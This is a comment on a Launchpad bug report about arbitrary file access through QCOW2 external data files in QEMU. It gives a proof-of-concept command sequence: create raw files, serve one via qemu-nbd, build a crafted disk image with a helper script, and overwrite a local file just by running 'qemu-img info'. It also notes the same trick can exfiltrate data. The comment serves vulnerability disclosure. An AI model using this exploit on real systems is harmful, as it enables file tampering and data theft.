Comment 44 for bug 2059809
Revision history for this message
| Martin Kaesberger (mkaesberger) wrote Re: Arbitrary file access through QCOW2 external data file | #44 |
© 2004
Canonical Ltd.
•
Terms of use
•
Data privacy
•
Contact Launchpad Support
•
Blog
•
Careers
•
System status
•
1b1ed1a
(Get the code!)
There is an obscure feature to embed QMP definitions for block devices into disk images. This does work for backing and data files in the QCOW2 format as well for extents in VMDK. So here is a proof of concept that overwrites a local file:
# prepare two files with random content
truncate -s 1M file-1.raw && dd if=/dev/random of=file-1.raw bs=64 count=1 conv=notrunc
truncate -s 1M file-2.raw && dd if=/dev/random of=file-2.raw bs=64 count=1 conv=notrunc
# serve the second file via NBD
qemu-nbd -p 1234 -f raw -x "data" -v -t -T 'nbd*' file-2.raw
# prepare the disk image
./qmp.sh
# ... and overwrite the first 112 bytes in file-1
qemu-img info disk.qcow2
Swap child1 and child2 to exfiltrate data or use the snapshot-access to deliver data to firewalled systems.